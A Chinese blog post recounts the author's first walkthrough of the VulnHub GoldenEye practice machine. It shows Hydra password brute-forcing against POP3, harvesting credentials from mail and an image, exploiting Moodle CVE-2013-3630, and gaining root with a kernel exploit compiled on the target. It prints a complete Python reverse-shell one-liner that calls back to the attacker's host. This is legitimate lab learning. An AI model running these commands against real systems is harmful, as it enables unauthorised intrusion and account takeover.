VulnHub-GoldenEye-学习记录

最新推荐文章于 2023-07-29 13:15:00 发布
最新推荐文章于 2023-07-29 13:15:00 发布
阅读量330 收藏 1
点赞数 3
文章标签: python linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51313985/article/details/120813867
版权

前言:最近有点迷茫后面的路不知道该怎么继续往下走,再团队师傅的指点下我开始对vulnhub的靶场进行学习,比较好的一点是靶机是从外网到内网的一整个过程,可以系统性的进行学习

关于靶机的教程网上已经有很多师傅写了,第一次打这种靶机也是参照了师傅们的方法,希望后面能养出自己的思路
首先把靶机从官网down下来,安装完靶机之后开始复现

1.nmap扫描

靶机是NAT桥接,共享的本机ip,使用nmap扫描本网段
基础的nmap指令百度一搜就有,这里就不放了
在这里插入图片描述
这里发现了目标ip:192.168.149.130
开始端口扫描
在这里插入图片描述
发现80端口,访问一下
在这里插入图片描述
一个网页,访问一下/sev-home/这个路径
在这里插入图片描述
需要账号密码登录,回到原来的界面查看一下源码信息
在这里插入图片描述
在这里插入图片描述
这里找到了boris的密码,拿去html解密
在这里插入图片描述
拿去登录就行了
在这里插入图片描述

查看源码
在这里插入图片描述
看不懂,翻译一下
请记住,由于默默无闻的安全性非常有效,因此我们将pop3服务配置为在很高的非默认端口上运行.
看到这想起了55006和55007两个端口,通过尝试55006端口访问被重置,55007成功访问
接下来通过hydra爆破口令

echo -e 'natalya\nboris' > yh.txt
使用该命令创建包含这两个用户名的文本

然后通过kali自带字典目录/usr/share/wordlists/进行爆破
hydra -L yh.txt -P /usr/share/wordlists/fasttrack.txt 192.168.149.130 -s 55007 pop3

在这里插入图片描述
我们成功爆破出这俩账号
用户:boris 密码:secret1!
用户:natalya 密码:bird
拿到登录凭证之后我们通过nc连接pop3服务
在这里插入图片描述
这里贴上这几个pop3命令的作用
user username 认证用户名
pass password认证密码认证,认证通过则状态转换
stat 处理请求server回送邮箱统计资料,如邮件数、邮件总字节数
retr n 处理server返回邮件的全部文本
在这里插入图片描述
至此我们看了boris的三封邮件没啥可用信息,登录另一个账号看一下
在这里插入图片描述
在这里插入图片描述
在第二封邮件里面有一组用户名和密码,并且给出了域名和网站,需要在本地服务hosts添加此域名信息
在这里插入图片描述
打开文本添加完之后重启一下network服务,然后通过浏览器访问http:severnaya-station.com/gnocertdir
使用刚刚邮件里的那组账号密码登录
在这里插入图片描述
右边区域好像还发现了admin用户发的公告
翻一下这个账号有啥吧,发现了一封邮件
在这里插入图片描述
这里一看又是一个用户名,接着使用hydra爆破
一样的步骤,将doak加入之前创建的txt文本中,或者重新建个文本
在这里插入图片描述
这里跑出来了
**用户:doak
密码:goat
**
接着nc连接pop3服务
在这里插入图片描述
找到了登录邮箱的账号密码,拿去登录
在这里插入图片描述
找到个txt文件,打开看一下
在这里插入图片描述
大概意思就是管理员的登录凭证隐藏在这个映像文件里,我们查看一下该图
在这里插入图片描述
可以使用weget命令把图片下载下来

wget http://severnaya-station.com/dir007key/for-007.jpg

这里我没有这个命令,懒得装了,就用浏览器直接下载了
下载到本地之后,这张图我们得分析一下,我先使用的binwalk命令没有得到有价值的东西,参考了一下教程使用strings
在这里插入图片描述
发现了这个base64编码,拿去解一下
在这里插入图片描述
至此我们拿到了管理员的密码,去登陆

2.漏洞利用

后面就是漏洞利用,发现为moodle 2.2.3,存在远程命令执行漏洞CVE-2013-3630
这里msf我不太会用陷入了点麻烦(后面得去学一下),找了一下还有另一种利用方式,找到网站管理系统路径发现可以上传python代码,进行反弹shell
在这里插入图片描述

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.149.128”,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

ip那里记得改成自己的
使用python对本地6666端口上传一个shell,然后本地开启端口6666进行监听
在这里插入图片描述
然后我们回到用户界面找一个能发送数据出去的地方
在这里插入图片描述
随便输入点东西
在这里插入图片描述
点击这里发送
这里不知道为啥监听失败了,还是决定拿MSF打一下
在这里插入图片描述
这里由于目标主机上不存在GCC编译,只能CC编译,所以在需要把Google Spell编译改成PSpellShell编译。
在这里插入图片描述
查找到exp,并设置好配置
在这里插入图片描述
打就完了
在这里插入图片描述
成功拿到了shell
接下来转tty

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述
这里查看到只是一个www-data的低权限用户,那就最后一步提权
在这里插入图片描述
这里看到了操作系统和内核版本号
可以在kali本地中查找shell
在这里插入图片描述
在这里插入图片描述
由于靶机未安装gcc编译,只能用cc编译,需要修改37292.c编译
在这里插入图片描述
gcc改成cc
在这里插入图片描述
本地开启服务
在这里插入图片描述
使用wget命令将37292.c文件下载到靶机目录,并且用cc进行编译
在这里插入图片描述
在这里插入图片描述
赋予权限之后运行exp,查看id终于成了,root权限
本靶机的挑战目标是通过root权限拿到flag.txt
在这里插入图片描述
我们进入root用户查看一下目录,找到了目标文件
在这里插入图片描述
访问flag路径
在这里插入图片描述
麻了,真不容易啊,第一次打碰到无数问题,心都碎了…好在成功了
在这里插入图片描述

bay0net
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub系列-GoldenEye-v1
Yasso的博客
01-04 634
靶机:192.168.12.132 kali:192.168.12.128 一、信息搜集 nmap -A -p- 192.168.12.132 查看80端口 web目录:/sev-home 访问发现需要用户名和密码 查看源代码 terminal.js 访问terminal.js文件 一串unicode编码 Boris的password 得到:用户名/密码=boris/InvincibleHack3r 成功登陆 查看源代码发现两个用户名 Natalya Boris 爆破密码 hydra -l Boris -P
Vulnhub-GoldenEye
m0_52016680的博客
09-18 463
Vulnhub类OSCP靶机
Vulnhub靶机 GoldenEye
菜浪马废的博客
04-27 352
80端口 账号:Boris 密码:InvincibleHack3r 暗示我利用pop3 将提到过的名字作为字典 hydra爆破 两个账户密码 pop命令 给了一个账号 让配置/etc/hosts 提到了一个名字 doak hydra爆破 有一个账号 让我们登录刚才的网站 一个文件地址 还有adm1n cr3ds clear txt 没处理 直接打开...
vulnhub-GoldenEye靶机
plant1234的博客
07-18 797
vulnhub-GoldenEye靶机: 准备工作: 首先根据根据网址下载靶场: 连接地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 设置: 1,获取地址之后用VMware导入打开,设置网络适配器为NAT模式 (也可以是其它的但要清楚网段) 2,开启靶机 目标: 得到root权限&找到flag.txt 开始测试 一、信息收集: 1、获取对应的靶机IP: 1、这里我们要知道靶机是在那一个网段可以在VMware的 编辑中的虚拟网络编辑器中查看,靶机所在
vulnhub 靶机 GOLDENEYE: 1
qq_44029310的博客
07-07 881
涉及知识点:pop3邮件服务器,隐写,hydra爆破,Moodle系统漏洞,反弹shell中base64编码绕过,CC编译。
Android-GoldenEye:Camera1和Camera2 API的包装,公开了易于使用的界面
02-03
然而,Camera2 API的复杂性是其主要缺点,对于开发者来说,理解和正确使用这个API需要较高的学习曲线。 ### Android-GoldenEye的作用 Android-GoldenEye库通过统一的接口,将Camera1和Camera2 API进行了抽象和封装...
Python-GoldenEye一个HTTPDoS测试工具
08-10
5. **日志记录**:记录测试过程中的关键数据,便于分析结果。 6. **报告生成**:生成详细的测试报告,包括响应时间、成功率等关键指标。 使用GoldenEye进行测试时,首先需要理解目标服务器的架构和预期负载能力,...
GoldenEye-master
05-09
GoldenEyedos是一款十分强的的dos工具,特别是对于一些中小型网站。
goldeneye-50.zip
04-26
《STK模型:goldeneye-50.zip的详解与应用》 STK,全称System Tool Kit,是一款广泛应用于航天、通信、气象等领域的高级仿真软件。它以其强大的建模和仿真能力,使得用户能够对复杂的系统进行精确的分析和预测。在...
靶机GoldenEye-V1练习报告1
08-08
靶机GoldenEye-V1练习报告1
goldengate中文版教程
02-04
goldengate中文版教程 概要 • GoldenGate公司简介 • GoldenGate TDM软件的工作原理 • GoldenGate TDM软件的主要应用 •成功案例 •问题与交流
软件破解教程
06-16
AccessDiver附图系列教程v4.113<br><br> ▲ AccessDiver附图教程v4.113之基础篇<br><br> ▲ AccessDiver附图教程v4.113之代理篇<br><br> ▲ AccessDiver附图教程v4.113之字典篇<br><br> ▲ AccessDiver附图教程v4.113之固定框<br><br> ▲ AccessDiver附图教程v4.113之单个框<br><br> ▲ AccessDiver附图教程v4.113之Exploit<br><br> ▲ AccessDiver附图教程v4.113之Auto-Pilot<br><br> ▲ AccessDiver附图教程v4.113之总结篇<br><br>★ GoldenEye附图系列教程v1.07<br><br> ▲ GoldenEye附图教程v1.07之基础篇<br><br> ▲ GoldenEye附图教程v1.07之代理篇<br><br> ▲ GoldenEye附图教程v1.07之字典篇<br><br> ▲ GoldenEye附图教程v1.07之固定框<br><br> ▲ GoldenEye附图教程v1.07之单个框<br><br> ▲ GoldenEye附图教程v1.07之Exploit<br><br> ▲ GoldenEye附图教程v1.07之AutoPilot<br><br>★ RaptorⅢ中文版附图教程<br><br>★ CMXploiter附图教程<br><br>★ CMXploiterIV附图教程<br><br>★ John The Ripper附图教程<br><br>★ CCBRIP附图教程<br><br>★ Ares附图教程<br><br>★ PassCraft附图教程<br><br>★ Exploit基本概念ABC<br><br>
VulnHub-GoldenEye-1-Walkthrough渗透学习
qq_34801745的博客
12-26 4100
** VulnHub-GoldenEye-1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 靶机难度:中等(CTF) 靶机发布日期:2018年5月4日 靶机描述:靶机命名来自詹士邦系列的电影——GoldenEye 目标:得到root权限&找到flag.txt 作者:大余 时间:2019-12-26 请注...
Vulnhub-GoldenEye  -靶机渗透
嗯嗯呐的博客
11-03 1190
Vulnhub-GoldenEye -靶机渗透 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 目标:root目录下flag.txt文件 提示:以下是本篇文章正文内容,下面案例可供参考 一、信息收集 按照完成靶机后,通过nmap扫描靶机...
渗透测试VulnHub-GoldenEye-1
m0_52923241的博客
10-22 363
VulnHub-GoldenEye-1VulnHub-GoldenEye-1 详细阶梯步骤知识点总结kali自带字典目录vim文本编辑器linux通过修改/etc/hosts文件 添加IP地址与域名的映射Moodle(CVE-2013-3630)在linux下如何本地开启端口常用工具篇POP3:电子邮件协议Hydra:暴力破解工具Netcat:网络测试工具burpsuite-Decoder:编码解码工具SearchSploit漏洞查找工具查看jpg文件底层内容工具 VulnHub-GoldenEye-1 详
Vulnhub-GoldenEye靶机渗透
蘇同学的安全屋的博客
08-29 310
GoldenEye、渗透、提权
vulnhub靶机GoldenEye实战(记录向)
kiwi的博客
02-01 380
接着我就去乱翻,翻到了一份邮件,是doak用户给我的。其实在另外一边我也尝试了搞25端口,因为我从来没有搞过25端口,按照老办法就是将扫描到的版本信息进行漏洞搜索,先问问度娘postfix smtp有什么漏洞,期间我查阅了大量资料,发现有一个漏洞可以进行邮件伪造,结合上面登录成功后的提示信息,我怀疑可能需要发送邮件给GNO,但是我哪里知道它的邮箱是什么,于是便在网上查阅信息,能否有一种方案能够通过ip发送,无奈,没有。我们改好了hosts文件,尝试访问登录,看起来像cms,但是我不确定,上。
【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
最新发布
xnxqwzy的博客
07-29 3210
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
机器学习驱动的海上CO2泄漏检测:CNN在Goldeneye实验中的应用
在Goldeneye的研究中,机器学习技术的应用显著提高了CO2泄漏的检测能力。通过分析来自模型模拟的实时数据,CNN能够实时监控并识别出异常行为,有助于优化传感器的部署和监测设计。这不仅节省了资源,还降低了误报和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值